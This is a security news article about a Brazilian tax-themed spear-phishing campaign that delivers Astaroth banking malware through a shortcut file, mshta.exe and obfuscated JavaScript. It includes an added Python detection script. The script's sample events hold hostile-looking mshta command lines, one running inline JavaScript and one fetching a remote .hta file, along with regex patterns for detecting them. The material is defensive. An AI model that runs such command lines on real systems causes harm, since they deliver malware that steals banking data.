A newly uncovered spear-phishing campaign targeting Brazil delivers the Astaroth (also known as Guildma) banking malware, using obfuscated JavaScript to slip past security safeguards.
“The spear-phishing campaign’s impact has been pervasive, with manufacturing firms, retail companies, and government agencies among the most severely affected,” according to Trend Micro’s latest assessment.
“Scammers craft deceitful emails masquerading as official tax documents, exploiting the pressure of individual income tax deadlines to coax victims into installing harmful software.”
The cybersecurity firm is tracking the threat activity cluster as “Water Makara”. Google’s Threat Analysis Group (TAG) tracks what appears to be the same intrusion set, which delivers the same malware to Brazilian users, under its own codename.
Whoever tracks them, the attacks share a common starting point: phishing emails impersonating official bodies such as Receita Federal, Brazil’s federal revenue service, that lure recipients into downloading a ZIP archive disguised as income tax documents.
Inside the ZIP archive is a Windows shortcut (LNK) that abuses mshta.exe, a legitimate Windows utility for running HTML Application (HTA) files, to execute obfuscated JavaScript that then connects to a command-and-control (C2) server.
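The chain above (shortcut double-click, mshta.exe, inline script, outbound connection) leaves a recognisable shape in process-creation telemetry. The following detection logic is an added example written for this page, not Trend Micro's or Google's code and not a signature from the campaign: it scores Sysmon Event ID 1 style events for mshta.exe launches that look like script delivery. The sample events, the parent-process lists, the point values and the alert threshold are all constructed assumptions; tune them against your own baseline of legitimate HTA use.

```python
"""Score process-creation events for the LNK -> mshta.exe -> script pattern."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass, field

# Inline script protocols and remote fetches are the two classic mshta abuse shapes.
INLINE_SCRIPT_RE = re.compile(r"\b(?:javascript|vbscript|about):", re.IGNORECASE)
REMOTE_URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
# A double-clicked .lnk is launched by the shell, so explorer.exe is the parent;
# mail or Office clients opening an attachment straight into mshta are equally odd.
# Both lists are assumptions for this example, not a vendor-published rule.
SHELL_PARENTS = {"explorer.exe"}
DOCUMENT_PARENTS = {"outlook.exe", "winword.exe", "excel.exe"}
ALERT_THRESHOLD = 3  # assumed; raise it if your estate runs HTA-based tooling


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list[str] = field(default_factory=list)


def score_event(event: dict) -> Finding | None:
    """Return a Finding for an mshta.exe launch that looks like script delivery, else None."""
    if ntpath.basename(event["image"]).lower() != "mshta.exe":
        return None
    parent = ntpath.basename(event["parent_image"]).lower()
    cmd = event["command_line"]
    finding = Finding(pid=event["pid"], score=0)

    def hit(points: int, why: str) -> None:
        finding.score += points
        finding.reasons.append(why)

    if parent in SHELL_PARENTS:
        hit(2, "spawned by the shell, consistent with a double-clicked shortcut")
    elif parent in DOCUMENT_PARENTS:
        hit(2, f"spawned by {parent}, consistent with an opened attachment")
    if INLINE_SCRIPT_RE.search(cmd):
        hit(3, "inline script protocol in command line")
    if REMOTE_URL_RE.search(cmd):
        hit(3, "remote URL in command line")
    if ".hta" not in cmd.lower():
        hit(1, "no .hta file argument")
    if len(cmd) > 250:
        hit(1, "unusually long command line, typical of obfuscated payloads")
    return finding if finding.score >= ALERT_THRESHOLD else None


def scan(events: list[dict]) -> list[Finding]:
    """Run score_event over a batch and keep only the events that cross the threshold."""
    return [f for f in (score_event(e) for e in events) if f is not None]


# Constructed sample events in Sysmon Event ID 1 style; not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" javascript:eval("...obfuscated...")'},
    {"pid": 5210, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\wizard.hta"'},
    {"pid": 5388, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\notepad.exe" C:\Users\ana\notes.txt'},
    {"pid": 6001, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": r"mshta http://203.0.113.7/tax/declaracao.hta"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid {finding.pid} score {finding.score}: " + "; ".join(finding.reasons))
```

Only the two constructed mshta events launched from the shell or a mail client with inline or remote script content cross the threshold; the vendor installer running a local .hta from its own parent does not. The scoring is deliberately additive so that a single weak signal (for example, a long command line) never alerts on its own.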
“While previously thought to be a relic of the past, the resurgence and ongoing development of the malware pose a persistent threat,” the researchers noted.
Beyond the stolen intellectual property itself, a successful infection has far-reaching consequences: erosion of customer trust, substantial regulatory penalties, the cost of business disruption and downtime, and the added burden of recovery and remediation.
To counter these attacks, the researchers advise strong password policies, multi-factor authentication, keeping security settings and software up to date, and adhering to the principle of least privilege. Since the infection chain described here runs through a shortcut launching mshta.exe rather than through stolen credentials, monitoring or restricting mshta.exe launches from the shell is the control that most directly addresses it.